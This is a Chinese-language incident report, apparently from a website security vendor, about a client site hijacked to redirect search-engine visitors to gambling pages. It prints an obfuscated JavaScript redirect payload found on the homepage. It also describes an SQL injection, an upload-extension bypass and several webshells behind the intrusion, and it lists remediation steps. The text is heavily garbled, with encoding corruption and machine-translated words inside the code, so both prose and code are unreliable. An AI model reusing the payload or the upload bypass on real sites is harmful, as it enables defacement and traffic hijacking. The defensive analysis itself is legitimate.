的解決方案該客戶網(wǎng)站最近被重定向到賭博網(wǎng)站。開(kāi)通后,將直接跳轉(zhuǎn)到北京賽車網(wǎng)站,PK10等內(nèi)容??蛻艟W(wǎng)站本身已由百度推廣,導(dǎo)致所有訪客跳轉(zhuǎn)到賭博網(wǎng)站??蛻魩?lái)了很多經(jīng)濟(jì)損失,另一個(gè)官方網(wǎng)站的形象也受到了影響。我們的SINE安全檢查客戶的網(wǎng)站,發(fā)現(xiàn)客戶網(wǎng)站TDK的標(biāo)題已被反復(fù)修改為(北京賽車PK10等內(nèi)容),立即進(jìn)行全面的源代碼安全審核和網(wǎng)站漏洞檢測(cè)以及網(wǎng)站漏洞修復(fù)客戶的網(wǎng)站。檢查客戶的主頁(yè)標(biāo)題TDK內(nèi)容確實(shí)被篡改,并添加了一些加密的惡意代碼,代碼如下:
Type='text/java'eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c + 29): c.toString(36) )};如果){而(C - )d [E(C)]=K [C] || E(c)中( '' 取代(/^ /,字符串!); K=[功能(例如){return d [e]}]; e=function(){return'\ w +'}; c=1;}; while(c - )if(k [c])p=p.replace(new RegExp ('\ b'+ e(c)+'\ b','g'),k [c]); return p;}('m ['\ 9 \ d \ 1 \ l \ i \ a \ n \ 0'] ['\ 8 \ 4 \ 6 \ 0 \ a']('\ h \ 3 \ 1 \ 4 \ 6 \ 2 \ 0 \ 0 \ k \ 2 \ a \ e \ 7 \ 0 \ a \ q \ 0 \ 5 \ g \ b \ f \ b \ 3 \ 1 \ 4 \ 6 \ 2 \ 0 \ 7 \ 3 \ 4 \ 1 \ e \ 7 \ o \ 0 \ 0 \ 2 \ 3 \ p \ 5 \ 5 \ 8 \ 8 \ 8 \ C \ 1 \ 2 \ 9 \ b \ 3 \ r \ C \ 1 \ d \ I \ 5 \ 9 \ 9 \?F\ 6 \ 2 \ C \克\ 3 \ 7 \?\?\ 5 \ 3 \ 1 \ 4 \ 6 \ 2 \ 0 \ J ');',28,28'X74 | X63 | X70 | X73 | X72 | X2F | X69 | X22 | X77 | X64 | X65 | X61 | X2E | x6f | X3D | X76 | X6A | X3C | X6D | x3e | X79 | X75 |窗口| x6e | X68 | X3A | X78 | x38'.split( '|'),0,{} ))
上面的網(wǎng)站代碼是ASCII碼,只要它轉(zhuǎn)換為Unicode代碼,就可以看到加密的真實(shí)內(nèi)容。我們的工程師解釋代碼并發(fā)現(xiàn)代碼是根據(jù)搜索引擎編寫(xiě)的,作為跳轉(zhuǎn)的標(biāo)準(zhǔn)。通常,代碼僅適用于搜索引擎。網(wǎng)站站長(zhǎng)直接輸入網(wǎng)址,但未找到網(wǎng)站跳轉(zhuǎn)。去賭博內(nèi)容網(wǎng)站,客戶的網(wǎng)站將直接跳轉(zhuǎn)到北京賽車,pk10網(wǎng)站通過(guò)百度或搜狗搜索。
針對(duì)上述問(wèn)題,我們立即刪除加密的跳轉(zhuǎn)代碼,首先盡量減少客戶網(wǎng)站的丟失,并促進(jìn)網(wǎng)站的正常訪問(wèn)(因?yàn)榭蛻粢恢痹谧霭俣韧茝V,一直在燒錢(qián)),通過(guò)一系列的安全測(cè)試,是因?yàn)榫W(wǎng)站的漏洞被上傳到特洛伊木馬并篡改了網(wǎng)站的主頁(yè)?在我們的正弦安全工程師對(duì)網(wǎng)站代碼進(jìn)行了詳細(xì)的安全測(cè)試后,發(fā)現(xiàn)網(wǎng)站系統(tǒng)中存在SQL注入漏洞,導(dǎo)致攻擊者獲得管理員帳戶。并且密碼和網(wǎng)站背景的地址也是默認(rèn)的管理目錄名,這樣黑客可以在獲取密碼后直接登錄到網(wǎng)站的后臺(tái)。當(dāng)在后臺(tái)安全檢測(cè)到網(wǎng)站時(shí),找到了產(chǎn)品圖片上傳功能,并且有一個(gè)旁路文件上傳腳本木馬。漏洞。
網(wǎng)站漏洞由$ this-> getext($ filear ['name'])在網(wǎng)站背景中的產(chǎn)品上傳頁(yè)面代碼中生成; //獲取擴(kuò)展名$ this-> set_savename($ file); //設(shè)置保存文件名,此代碼可以繞過(guò)文件擴(kuò)展名并以php格式上傳腳本文件,這樣攻擊者就可以輕松獲取網(wǎng)站的權(quán)限??蛻暨€報(bào)告說(shuō),該網(wǎng)站經(jīng)常被反復(fù)篡改,導(dǎo)致跳轉(zhuǎn)到賭博網(wǎng)站,尋找公司建立網(wǎng)站,他們只是刪除了代碼,并且不久它們被篡改,導(dǎo)致嚴(yán)重?fù)p失了客戶的網(wǎng)站。篡改跳躍的根本原因是網(wǎng)站存在漏洞。如果網(wǎng)站漏洞沒(méi)有得到修復(fù),即使刪除了惡意代碼,也只是一種膚淺的工作。如果它不起作用,它將被反復(fù)偽造,它將無(wú)濟(jì)于事。需要在網(wǎng)站上進(jìn)行安全測(cè)試,以及網(wǎng)站漏洞檢測(cè),修復(fù)網(wǎng)站漏洞,清除木馬的后門(mén),保護(hù)網(wǎng)站,使網(wǎng)站更安全,更穩(wěn)定。
網(wǎng)站漏洞修復(fù)的過(guò)程如下:
安全加固客戶端網(wǎng)站源代碼和前端過(guò)濾代碼,防止sql注入,網(wǎng)站的后臺(tái)目錄安全設(shè)置,將管理文件名改為@%admin,對(duì)網(wǎng)站后臺(tái)圖片上傳功能代碼進(jìn)行漏洞修復(fù),并設(shè)置上傳文件的白名單機(jī)制。并且文件上傳目錄設(shè)置了腳本安全權(quán)限,禁止腳本,并且上傳的文件擴(kuò)展名也被深度過(guò)濾,網(wǎng)站的數(shù)據(jù)庫(kù)安全部署,數(shù)據(jù)庫(kù)的連接信息被加密,根管理權(quán)限被刪除,并設(shè)置設(shè)置。普通的數(shù)據(jù)庫(kù)賬號(hào),讀寫(xiě)分離,新表,查詢表,寫(xiě)表等數(shù)據(jù)庫(kù)的正常操作權(quán)限,網(wǎng)站后臺(tái)的賬號(hào)密碼比較復(fù)雜,密碼是12位+字母+大小寫(xiě)組合,從發(fā)現(xiàn)網(wǎng)站漏洞到目前為止,在解決問(wèn)題的過(guò)程中,共發(fā)現(xiàn)了3個(gè)腳本木馬(webshel??l),并發(fā)現(xiàn)了小馬后門(mén)的一個(gè)句子。網(wǎng)站的模板內(nèi)容也被篡改,導(dǎo)致客戶端在生成主頁(yè)時(shí)生成惡意加密代碼。 。
網(wǎng)站安全預(yù)防措施:
1.盡量避免網(wǎng)站背景的默認(rèn)名稱,例如admin manage houtai
2.控制網(wǎng)站上傳目錄的權(quán)限。 (不設(shè)置腳本執(zhí)行權(quán)限)
3.網(wǎng)站背景中的用戶名和密碼設(shè)置比較復(fù)雜,數(shù)字+字母+大寫(xiě)+特殊符號(hào)組合。
4.阿里云虛擬主機(jī)用戶的FTP帳號(hào)密碼應(yīng)設(shè)置為復(fù)雜點(diǎn),數(shù)字+字母+大寫(xiě)+特殊符號(hào)組合。
5.如果它是單獨(dú)服務(wù)器的客戶端,建議首先部署服務(wù)器的安全性,安全地部署每個(gè)網(wǎng)站的文件夾,安全地部署數(shù)據(jù)庫(kù),然后保護(hù)網(wǎng)站。否則,您的網(wǎng)站是安全的,服務(wù)器不安全。它沒(méi)有幫助。如果您不了解安全性,建議找專業(yè)的網(wǎng)站安全公司來(lái)解決問(wèn)題。